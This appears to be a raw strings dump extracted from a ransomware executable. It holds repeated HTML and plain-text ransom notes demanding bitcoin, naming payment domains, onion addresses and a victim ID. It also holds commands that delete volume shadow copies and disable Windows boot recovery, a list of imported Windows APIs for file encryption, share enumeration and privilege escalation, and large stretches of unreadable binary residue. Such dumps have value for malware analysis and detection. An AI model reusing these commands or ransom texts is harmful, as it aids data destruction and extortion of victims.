transferred to  <!------===2134123421=34234123421342134213=====2134=123=2314 -->your computer via  <!------===2134123421=34234123421342134213=====2134=123=2314 -->the Internet.<br> <!------===2134123421=34234123421342134213=====2134=123=2314 --> Decrypting of  <!------===2134123421=34234123421342134213=====2134=123=2314 -->YOUR FILES is 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->only possible  <!--- -===2134123421=34234123421342134213=====2134=123=2314 -->with the help of the  <!----===2134123421=34234123421342134213=====2134=123=2314 -->private key and  <!--===2134123421=34234123421342134213=====2134=123=2314 -->decrypt program, 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->which is on our  <!--- -===2134123421=34234123421342134213=====2134=123=2314 -->Secret Server!!!
*</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you  <!------dsgdfgsdg -->  do not take 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->  the necessary measures 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->for the specified <!------===2134123421=34234123421342134213=====2134=123=2314  --> time then the conditions for <!------===2134123421=34234123421342134213=====2134=123=2314 --> obtaining the private key will be changed.<br>
<!------===2134123421=34234123421342134213=====2134=123=2314 --> If you really need <!------===2134123421=34234123421342134213=====2134=123=2314  --> your data, then we suggest you <!------===2134123421=34234123421342134213=====2134=123=2314 --> do not waste valuable <!------===2134123421=34234123421342134213=====2134=123=2314 --> time searching for other  <!------===2134123421=34234123421342134213=====2134=123=2314  -->  solutions becausen 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->  they do not exist.</font><br><br>
<!------===2134123421=34234123421342134213=====2134=123=2314 --><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions,
please visit your <!------===2134123421=34234123421342134213=====2134=123=2314 -->  personal home page, there are a few <!------===2134123421=34234123421342134213=====2134=123=2314 -->  different addresses pointing to <!------===2134123421=34234123421342134213=====2134=123=2314 -->   your page below: <hr>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>1.<a href="http://vr6g2curb2kcidou.encpayment23.com/%S"   target="_blank">http://vr6g2curb2kcidou.encpayment23.com/%S</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>2.<a href="http://vr6g2curb2kcidou.expay34.com/%S"   target="_blank">http://vr6g2curb2kcidou.expay34.com/%S</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>3.<a href="http://psbc532jm8c.hsh73cu37n1.net/%S"   target="_blank">http://psbc532jm8c.hsh73cu37n1.net/%S</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>4.<a href="https://vr6g2curb2kcidou.onion.to/%S" target="_blank">https://vr6g2curb2kcidou.onion.to/%S</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the
<!------===2134123421=34234123421342134213=====2134=123=2314  --> addresses are not available, <!------===2134123421=34234123421342134213=====2134=123=2314  --> follow these steps: <hr>
1. <!------===2134123421=34234123421342134213=====2134=123=2314  -->  Download and <!------===2134123421=34234123421342134213=====2134=123=2314  --> install tor-browser: 
<a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>
2. <!--===2134123421=34234123421342134213=====2134=123=2314  -->  After a successful<!------===2134123421=34234123421342134213=====2134=123=2314  --> installation, run the browser and wait for initialization.<br>
3. <!-- ===2134123421=34234123421342134213=====2134=123=2314  --> Type<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> in<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> the tor-browser<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> address<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> bar: <font style="font-weight:bold; color:#009977;"><!-- ===2134123421=34234123421342134213=====2134=123=2314  -->vr6g2curb2kcidou.onion/%S<!-- ===2134123421=34234123421342134213=====2134=123=2314  --></font><!-- ===2134123421=34234123421342134213=====2134=123=2314  --><br>
4. <!-- ===2134123421=34234123421342134213=====2134=123=2314  -->  Follow the instructions <!-- ===2134123421=34234123421342134213=====2134=123=2314  --> on the site.</div><br><br><b>IMPORTANT INFORMATION:</b><br>
<div class="tb" style="width:790px;">
<!------===2134123421=34234123421342134213=====2134=123=2314  --> Your Personal PAGES: 
<b><br> <a href="http://vr6g2curb2kcidou.encpayment23.com/%S" target="_blank">http://vr6g2curb2kcidou.encpayment23.com/%S</a> <br><a href="http://vr6g2curb2kcidou.expay34.com/%S" target="_blank">http://vr6g2curb2kcidou.expay34.com/%S</a> <br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><a href="http://psbc532jm8c.hsh73cu37n1.net/%S" target="_blank">http://psbc532jm8c.hsh73cu37n1.net/%S</a>  <br> 
<!------===2134123421=34234123421342134213=====2134=123=2314  --> <a href="https://vr6g2curb2kcidou.onion.to/%S" target="_blank">
<!------===2134123421=34234123421342134213=====2134=123=2314  --> https://vr6g2curb2kcidou.onion.to/%S</a> </b> <br> 
<!------===2134123421=34234123421342134213=====2134=123=2314  --> Your <!------===2134123421=34234123421342134213=====2134=123=2314  --> Personal PAGES  
<!------===2134123421=34234123421342134213=====2134=123=2314  -->  (using TOR-Browser):
<!------===2134123421=34234123421342134213=====2134=123=2314  --><font style="font-weight:bold; color:#009977;"><!-- ===2134123421=34234123421342134213=====2134=123=2314  -->vr6g2curb2kcidou.onion/%S<!-- ===2134123421=34234123421342134213=====2134=123=2314  --></font><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --> Your personal <!------===2134123421=34234123421342134213=====2134=123=2314  -->  code 
<!------===2134123421=34234123421342134213=====2134=123=2314  -->  (if you open the <!------===2134123421=34234123421342134213=====2134=123=2314  -->  site (or TOR-Browser's) directly):
<!------===2134123421=34234123421342134213=====2134=123=2314  --> <font style="font-weight:bold; color:#770000;">%S</font><br>
</div></div></center></body></html>
vssa
dmin
.exe
delete 
shadows 
/all 
/Quiet 
open
runas
sdflk35jghs
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
SeDebugPrivilege
bcdedit.exe /set {current} bootems off
bcdedit.exe /set {current} advancedoptions off
bcdedit.exe /set {current} optionsedit off
bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
bcdedit.exe /set {current} recoveryenabled off
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
PathFindExtensionW
PathFindFileNameW
SHLWAPI.dll
EnumProcesses
GetProcessImageFileNameW
PSAPI.DLL
wcsstr
wcsncmp
strstr
_snwprintf
_vsnwprintf
ntdll.dll
ReadFile
GetFileSize
FindFirstFileW
SetFilePointer
GetDriveTypeW
HeapAlloc
MoveFileExW
GetLogicalDriveStringsW
HeapFree
GetProcessHeap
WriteFile
GlobalAlloc
Sleep
GetFileAttributesW
CreateFileW
ExitThread
FlushFileBuffers
GetLastError
GlobalFree
FindClose
FindNextFileW
CloseHandle
DeleteFileW
SetFileAttributesW
GetVolumeInformationW
GlobalMemoryStatus
FreeLibrary
QueryPerformanceCounter
GetTickCount
LoadLibraryW
GetVersionExW
GetProcAddress
GetCurrentProcessId
ExitProcess
GetEnvironmentVariableW
CreateProcessW
GetCurrentProcess
WaitForSingleObject
GetModuleHandleW
CopyFileW
GetModuleFileNameW
SetThreadPriority
SetLastError
LocalAlloc
GetShortPathNameW
LocalFree
CreateThread
KERNEL32.dll
LoadStringW
ReleaseDC
GetDC
DrawTextA
USER32.dll
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteObject
DeleteDC
GetStockObject
CreateFontW
SetBkMode
GetDIBits
SetTextColor
GDI32.dll
RegCreateKeyExW
RegQueryValueExA
RegQueryValueExW
RegCreateKeyExA
RegFlushKey
RegCloseKey
RegSetValueExW
OpenProcessToken
GetSidSubAuthority
GetTokenInformation
LookupPrivilegeValueA
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
AdjustTokenPrivileges
ADVAPI32.dll
ShellExecuteExW
SHGetFolderPathW
ShellExecuteExA
SHGetSpecialFolderPathW
SHELL32.dll
CoCreateInstance
ole32.dll
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
MPR.dll
InternetConnectA
InternetCrackUrlA
InternetOpenUrlW
HttpOpenRequestA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
RtlUnwind
GetSystemTimeAsFileTime
DecodePointer
HeapReAlloc
GetCommandLineW
HeapSetInformation
GetStartupInfoW
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
EncodePointer
HeapCreate
GetStdHandle
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetCurrentThreadId
LCMapStringW
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionAndSpinCount
SetHandleCount
GetFileType
DeleteCriticalSection
FreeEnvironmentStringsW
GetEnvironmentStringsW
RaiseException
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
MultiByteToWideChar
GetStringTypeW
SetStdHandle
HeapSize
WriteConsoleW
IsProcessorFeaturePresent
SetEndOfFile
_aullshr
_allshl
_alldiv
00P`00P
++}V++}
&&jL&&j
66Zl66Z
??A~??A
44\h44\
11Sb11S
##eF##e
''iN''i
,,tX,,t
;;Mv;;M
)){R)){
//q^//q
  `@  `
99Kr99K
33Uf33U
<<Dx<<D
88Hp88H
!!cB!!c
==Gz==G
""fD""f
**~T**~
22Vd22V
::Nt::N
$$lH$$l
77Yn77Y
%%oJ%%o
..r\..r
>>B|>>B
55_j55_
((xP((x
--wZ--w
R~AeS~Ae	
j:'^
+NpHhXpHh
@CFg
lZrNlZr
X6-9'6-9
[TE$6.:$6.
 ?ZwKiZwK
&O\r
gDf;
?uV},
bT~FbT~F
*?#1*?#
f1tN
JFeQ
+8$4,8$4
%w(<I
!Hl\tHl\
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
XrYy
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
                        
        
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
\	vu
e	F>\
>'l7
3pz-
e!,Y-
?9fl
kfL9
L{Yw
Bw#L
+JS%
	(|;"
	9$[{
=ZVW
\7+J"`l
17FwgPryq2ZUM8QTaPEufwgfDoaog2ZaAP
:=#x
L!QR
v3{:
4EA2BB7D9FE4961982304C960816B590F845A268273044262C550D14B4F0E955B337C736067A2B804101AA27CE949885E56D0607D0CFFA454E8303D13E6D73BE
:=#x
L!QR
v3{:
4EA2BB7D9FE4961982304C960816B590F845A268273044262C550D14B4F0E955B337C736067A2B804101AA27CE949885E56D0607D0CFFA454E8303D13E6D73BE
50944CE772A3E96B682D5C78F0778EBC87EBE6B77B6BF4984E840388E5AC9EDEB78AE8AABE13A5493D4030AAD96E5963801406C69859199FE639F10CFC4587072
131.254.153.6
 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111  
NOT YOUR LANGUAGE? USE https://translate.google.com 
What happened to your files ?
All of your files were protected by a strong encryption with RSA-4096.
More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)
What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
How did this happen ?
---Specially for your PC was generated personal RSA-4096 KEY, both public and private.
---ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
What do I do ?
So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BTC NOW, and restore your data easy way.
If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.
For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1. http://vr6g2curb2kcidou.encpayment23.com/1E518124E068F14E
2. http://vr6g2curb2kcidou.expay34.com/1E518124E068F14E
3. http://psbc532jm8c.hsh73cu37n1.net/1E518124E068F14E
4. https://vr6g2curb2kcidou.onion.to/1E518124E068F14E 
If for some reasons the addresses are not available, follow these steps:
1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 
2. After a successful installation, run the browser and wait for initialization.
3. Type in the address bar: vr6g2curb2kcidou.onion/1E518124E068F14E 
4. Follow the instructions on the site.
IMPORTANT INFORMATION:
Your personal pages:
http://vr6g2curb2kcidou.encpayment23.com/1E518124E068F14E
http://vr6g2curb2kcidou.expay34.com/1E518124E068F14E
http://psbc532jm8c.hsh73cu37n1.net/1E518124E068F14E 
https://vr6g2curb2kcidou.onion.to/1E518124E068F14E  
Your personal page (using TOR-Browser): vr6g2curb2kcidou.onion/1E518124E068F14E 
Your personal identification number (if you open the site (or TOR-Browser's) directly): 1E518124E068F14E
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
<html>
<!-- ===2134123421=34234123421342134213=====2134=123=2314 --> <style>a { color:green; }.tb {  background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }
.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <!--===2134123421=34234123421342134213=====2134=123=2314-===2134123421=34234123421342134213=====2134=123=2314 --> <center>
<div style="text-align:left; font-family:Arial; <!------===2134123421=34234123421342134213=====2134=123=2314 -->  font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">
<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>
What happened <!------===2134123421=34234123421342134213=====2134=123=2314 --> to your files?</b></font><br> <font style="font-size:13px;">All of your files were<!------===2134123421=34234123421342134213=====2134=123=2314  -->  protected by a strong<!------===2134123421=34234123421342134213=====2134=123=2314  --> encryption with<!------===2134123421=34234123421342134213=====2134=123=2314  --> RSA-4096 
<br> More information about the <!------===2134123421=34234123421342134213=====2134=123=2314 -->encryption RSA-4096 can be<!------===2134123421=34234123421342134213=====2134=123=2314  --> found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font>
<br><b><font class="ttl">What <!------===2134123421=34234123421342134213=====2134=123=2314 --> does this mean?</b></font><br><font style="font-size:13px;">
This<!------===2134123421=34234123421342134213=====2134=123=2314 -->  means that the <!------===2134123421=34234123421342134213=====2134=123=2314 --> structure and data within your files have been irrevocably <!------===2134123421=34234123421342134213=====2134=123=2314 -->changed, you will not be able to work<br> with them, read<!------===2134123421=34234123421342134213=====2134=123=2314  --> them or see them, it is the same thing <!------2333232 -->as losing them forever, 
but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font>  <br>    <font style="font-size:13px;">  Especially for you, on our server was generated the secret key pair RSA-4096 - public and private.
<br>All your  <!------===2134123421=34234123421342134213=====2134=123=2314 --> files were encrypted with the public key, <!------===2134123421=34234123421342134213=====2134=123=2314 --> which has been <!------===2134123421=34234123421342134213=====2134=123=2314 --> 
transferred to  <!------===2134123421=34234123421342134213=====2134=123=2314 -->your computer via  <!------===2134123421=34234123421342134213=====2134=123=2314 -->the Internet.<br> <!------===2134123421=34234123421342134213=====2134=123=2314 --> Decrypting of  <!------===2134123421=34234123421342134213=====2134=123=2314 -->YOUR FILES is 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->only possible  <!--- -===2134123421=34234123421342134213=====2134=123=2314 -->with the help of the  <!----===2134123421=34234123421342134213=====2134=123=2314 -->private key and  <!--===2134123421=34234123421342134213=====2134=123=2314 -->decrypt program, 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->which is on our  <!--- -===2134123421=34234123421342134213=====2134=123=2314 -->Secret Server!!!
*</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you  <!------dsgdfgsdg -->  do not take 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->  the necessary measures 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->for the specified <!------===2134123421=34234123421342134213=====2134=123=2314  --> time then the conditions for <!------===2134123421=34234123421342134213=====2134=123=2314 --> obtaining the private key will be changed.<br>
<!------===2134123421=34234123421342134213=====2134=123=2314 --> If you really need <!------===2134123421=34234123421342134213=====2134=123=2314  --> your data, then we suggest you <!------===2134123421=34234123421342134213=====2134=123=2314 --> do not waste valuable <!------===2134123421=34234123421342134213=====2134=123=2314 --> time searching for other  <!------===2134123421=34234123421342134213=====2134=123=2314  -->  solutions becausen 
<!------===2134123421=34234123421342134213=====2134=123=2314 -->  they do not exist.</font><br><br>
<!------===2134123421=34234123421342134213=====2134=123=2314 --><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions,
please visit your <!------===2134123421=34234123421342134213=====2134=123=2314 -->  personal home page, there are a few <!------===2134123421=34234123421342134213=====2134=123=2314 -->  different addresses pointing to <!------===2134123421=34234123421342134213=====2134=123=2314 -->   your page below: <hr>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>1.<a href="http://vr6g2curb2kcidou.encpayment23.com/1E518124E068F14E"   target="_blank">http://vr6g2curb2kcidou.encpayment23.com/1E518124E068F14E</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>2.<a href="http://vr6g2curb2kcidou.expay34.com/1E518124E068F14E"   target="_blank">http://vr6g2curb2kcidou.expay34.com/1E518124E068F14E</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>3.<a href="http://psbc532jm8c.hsh73cu37n1.net/1E518124E068F14E"   target="_blank">http://psbc532jm8c.hsh73cu37n1.net/1E518124E068F14E</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><b>4.<a href="https://vr6g2curb2kcidou.onion.to/1E518124E068F14E" target="_blank">https://vr6g2curb2kcidou.onion.to/1E518124E068F14E</a></b><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the
<!------===2134123421=34234123421342134213=====2134=123=2314  --> addresses are not available, <!------===2134123421=34234123421342134213=====2134=123=2314  --> follow these steps: <hr>
1. <!------===2134123421=34234123421342134213=====2134=123=2314  -->  Download and <!------===2134123421=34234123421342134213=====2134=123=2314  --> install tor-browser: 
<a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>
2. <!--===2134123421=34234123421342134213=====2134=123=2314  -->  After a successful<!------===2134123421=34234123421342134213=====2134=123=2314  --> installation, run the browser and wait for initialization.<br>
3. <!-- ===2134123421=34234123421342134213=====2134=123=2314  --> Type<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> in<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> the tor-browser<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> address<!-- ===2134123421=34234123421342134213=====2134=123=2314  --> bar: <font style="font-weight:bold; color:#009977;"><!-- ===2134123421=34234123421342134213=====2134=123=2314  -->vr6g2curb2kcidou.onion/1E518124E068F14E<!-- ===2134123421=34234123421342134213=====2134=123=2314  --></font><!-- ===2134123421=34234123421342134213=====2134=123=2314  --><br>
4. <!-- ===2134123421=34234123421342134213=====2134=123=2314  -->  Follow the instructions <!-- ===2134123421=34234123421342134213=====2134=123=2314  --> on the site.</div><br><br><b>IMPORTANT INFORMATION:</b><br>
<div class="tb" style="width:790px;">
<!------===2134123421=34234123421342134213=====2134=123=2314  --> Your Personal PAGES: 
<b><br> <a href="http://vr6g2curb2kcidou.encpayment23.com/1E518124E068F14E" target="_blank">http://vr6g2curb2kcidou.encpayment23.com/1E518124E068F14E</a> <br><a href="http://vr6g2curb2kcidou.expay34.com/1E518124E068F14E" target="_blank">http://vr6g2curb2kcidou.expay34.com/1E518124E068F14E</a> <br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --><a href="http://psbc532jm8c.hsh73cu37n1.net/1E518124E068F14E" target="_blank">http://psbc532jm8c.hsh73cu37n1.net/1E518124E068F14E</a>  <br> 
<!------===2134123421=34234123421342134213=====2134=123=2314  --> <a href="https://vr6g2curb2kcidou.onion.to/1E518124E068F14E" target="_blank">
<!------===2134123421=34234123421342134213=====2134=123=2314  --> https://vr6g2curb2kcidou.onion.to/1E518124E068F14E</a> </b> <br> 
<!------===2134123421=34234123421342134213=====2134=123=2314  --> Your <!------===2134123421=34234123421342134213=====2134=123=2314  --> Personal PAGES  
<!------===2134123421=34234123421342134213=====2134=123=2314  -->  (using TOR-Browser):
<!------===2134123421=34234123421342134213=====2134=123=2314  --><font style="font-weight:bold; color:#009977;"><!-- ===2134123421=34234123421342134213=====2134=123=2314  -->vr6g2curb2kcidou.onion/1E518124E068F14E<!-- ===2134123421=34234123421342134213=====2134=123=2314  --></font><br>
<!------===2134123421=34234123421342134213=====2134=123=2314  --> Your personal <!------===2134123421=34234123421342134213=====2134=123=2314  -->  code 
<!------===2134123421=34234123421342134213=====2134=123=2314  -->  (if you open the <!------===2134123421=34234123421342134213=====2134=123=2314  -->  site (or TOR-Browser's) directly):
<!------===2134123421=34234123421342134213=====2134=123=2314  --> <font style="font-weight:bold; color:#770000;">1E518124E068F14E</font><br>
</div></div></center></body></html>
 """"
" ""
"""""
 """"
""""""
" " 
  """
" " "
""""
"" """"""
  "" ""
"   
 " """""""" 
""" 
" """"""" 
""" " 
"""" 
"   
"""""""""" 
"""" """"""
"""" 
"""""""" 
""""""
" ""
"""""" 
   ""
"" ""
"  " 
"""""  
""" "  """ " 
" """" "" """
""" "
"" "" " "
""   
  """
" "" 
""" 
""" 
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
010<0r0
1 1C1
192f2
3*3<3i3|3
4!4)444J4\4
5B5u5
5 676D6M6S6h6}6
6>7y7
8<8q8
8G:|:
;#;c;
<4<g<
=#=z=
=$>4>D>
0K1S1Y1
1#1-121:1A1O1T1
1I3^3c3
4#42474D4S4X4c4j4x4}4
9G9[9{9
:6:d:i:
:!;+;5;:;C;M;R;Z;a;o;t;
4 4b5i5
<e=x=}=
< <$<(<,<0<
L1~1
1#3>3
4N4d4
7#7(7;7
8T8j8T=c=
=9>\>
6>6T6v8
0+1:1D1N1U1\1c1j1q1x1
666t6
7'7;7@7L7i7x7
8V8o8
9?9R9\9}9
<9<b<
=@=~=
040J0]0
1&1^1n1v1~1
2-2>2I2a2
3-333:3w3|3
31474F4K4U4d4i4q4x4
5 5N5S5
:d=z=
;4<;<
;@;S;X;
>3Q3V3
4Q4[4e4j4s4}4
4\5q5v5
5A6F6
:(:-:
;$;);E;R;
<k<q<
='=,=}=
=2?G?]?b?t?
60L0R0i0
1!1G2`2e2
3V<l<q<
=%=+=>=\=b=u=
=0>V>\>o>
?2?8?N?s?x?
S2a2g2m2s2x2~2
393r3x3}3	4q4x4
757<7j7p7
8M8S8e8l8y8
8,9R9u9o:
:;>Q>W>\>a>f>k>p>v>|>
>!?'?2?C?~?
1#1(1W1g1m1}1
2c2}2
3$3*323<3J3X3k3x3~3
5I5w5
6$616=6Q6Z6_6
6)767?7D7S7
9!9-999E9Q9]9i9
92:x:
<(<-<6<;<J<g<p<y<~<
=!=)=2=7=
5N6T6y6
7*7T7
848J8r8
9A9H9w9|9
:":1:@:O:^:m:z:
;+;2;R;X;q;w;
;W<`<t<y<
=#=(=2=q=~=
=%>0?6?<?F?Z?g?m?s?z?
0)080L0T0Y0c0p0z0
0\1h1
2&2+20252:2?2D2I2N2S2X2]2b2g2l2~2
2&3:3C3S3Z3f3y3
394E4t4
616E6L6V6d6v6
707e7k7q7|7
9!9l9
: :I:U:
;#;+;3;:;`;
<G=M=
>)>=>D>
?)?5?A?T?[?n?
A0r0{0
1L1Z1w1
[>q>w>
?	?3?i?
0&000:0D0[0e0o0y0
1(121<1F1P1`1j1t1~1
2-272A2K2o2y2
3<3F3P3Z3d3n3x3
4'414;4E4\4f4p4z4
5)535=5G5Q5a5k5u5
6.686B6L6p6z6
7=7G7Q7[7e7o7y7
8(828<8F8]8g8q8{8
9*949>9H9R9b9l9v9
:/:9:C:M:r:
;";5;E;U;e;
<&<X<e<x<
='=:=J=z=
><>I>\>l>
?.?l?y?
0I0V0i0y0
2'212;2_2i2s2}2
2	3-373A3K3U3_3i3
4#4-474O4Y4c4m4w4
5'515;5E5U5_5i5s5
6#6-676A6e6o6y6
737=7G7Q7[7e7o7
8)838=8U8_8i8s8}8
9#9-979A9K9[9e9o9y9
:):3:=:G:k:u:
;9;C;M;W;a;k;u;
<%<5<B<R<b<{<
<o=v=
>&>->8>?>J>Q>b>i>w>~>
? ?+?2?=?D?U?\?j?q?|?
0%00070H0O0]0d0o0v0
1#1*1:1A1O1V1a1h1s1z1
1D2`2
3U4[4m4
4K7t7]8
:V:N>
0N1T1]1d1
2!2&282B2G2c2m2
3%3K3R3l3s3
3n4t4
5?5N5V5c5o5{5
6*70757=7M7W7]7q7
8(838?8D8T8Y8_8e8{8
:<;C;P;V;
<Y=h=
3O3{3
9&9L9
9?=0>w?
4 4$4(4,404?4K4_4r4
5$5X5e5z5
6B6i6v6|6K7-8A8e8q;
>K>w>
7E7P7Z7s7}7
7 838
8	9x9
:+:=:X:`:h:
;0;A;U;
<O=}=
> >Y>
?%?G?\?
0,0R0
01191
2!2&252K2Q2Y2^2f2k2s2x2
4 40474F4R4_4
5*535W5
7%8H8j8u8
9,919
=<>C>X>
?.?^?p?
0Q0[0s0
0A2d2o2
2(3/393K3b3p3v3
5!5&5+505@5o5u5}5
6 6.6
6&757E7L7T7
8%8y8~8
;!<^<m<
<^>j>p>u>{>
?=?]?
1G1Q1
;%;`;
; <)<5<n<w<
<E>c>
0 0&00090D0I0R0\0g0
1%1I1j1
5,6O6
;A;S;e;w;
=$=+=3=8=<=@=i=
> >$>(>,>
?I?P?T?X?\?`?d?h?l?
161C1H1V1"3
4 4?4Q4d4v4
8-8M8W8n8
</<8<g<z<
>@>K>y>
?C?P?x?
)0S0s0
1Y1_1v1
1n2s2
546;6
6<7m7
9f:u:
1?1]1d1h1l1p1t1x1|1
1B2M2h2o2t2x2|2
3f3l3p3t3x3
3$3(3
=$=,=4=
2(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
5 5,646@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7074787<7@7D7H7L7\7`7
=,=X=
6,606@6D6L6d6t6x6
687X7x7
8(8H8h8
989D9`9|9
: :@:`:
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8
9,989<9@9D9H9`9h9p9P=T=X=\=`=d=h=l=p=t=
=(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2d2h2l2p2t2x2|2
